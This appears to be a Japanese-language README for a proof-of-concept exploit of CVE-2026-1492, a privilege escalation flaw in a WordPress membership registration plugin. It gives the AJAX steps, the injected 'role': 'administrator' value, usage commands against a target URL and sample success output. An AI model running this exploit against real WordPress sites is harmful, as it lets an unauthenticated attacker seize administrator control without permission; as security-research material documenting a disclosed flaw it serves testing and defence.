
CVE-2026-1492の概念実証エクスプロイト。WordPressのUser Registrationプラグインにおける脆弱性を利用し、細工したメンバーシップ登録を通じて認証なしで管理者への権限昇格を可能にします。
このリポジトリには、WordPressのUser Registration & Membershipプラグインに影響する重大な脆弱性であるCVE-2026-1492の概念実証エクスプロイトが含まれています。
この脆弱性により、認証されていない攻撃者がメンバーシップ登録プロセスを悪用して管理者アカウントを作成できます。
👉 この脆弱性の完全な技術分析はこちらで入手できます:
技術分析
バックエンドが攻撃者制御のデータをどのように処理するか、そしてなぜ権限昇格が可能になるのかを段階的に説明しています。
このプラグインは、メンバーシップ登録プロセス中にユーザー制御の入力を不適切に信頼しています。
具体的には:
roleを受け入れますこれにより、攻撃者は以下を設定できます:
"role": "administrator"
そして完全な管理アクセスを取得できます。
悪用に成功すると、以下が可能になります:
この脆弱性は、複数ステップのAJAXプロセスを通じてトリガーされます:
user_registration_user_form_submitを介してユーザーを登録user_registration_membership_register_memberを介してメンバーシップ登録をトリガーadministrator) を注入python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Extracting tokens...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Sending registration request...
[+] User created
[*] Sending membership request...
[+] Privilege escalation successful
生成された認証情報を使用してログインします:
http://target/wp-login.php
次に管理パネルにアクセスします:
http://target/wp-admin/
注: 管理パスはカスタマイズされている場合があります。
このエクスプロイトは、教育目的および許可されたセキュリティテストのみを目的として提供されています。
許可なくシステムに対して使用しないでください。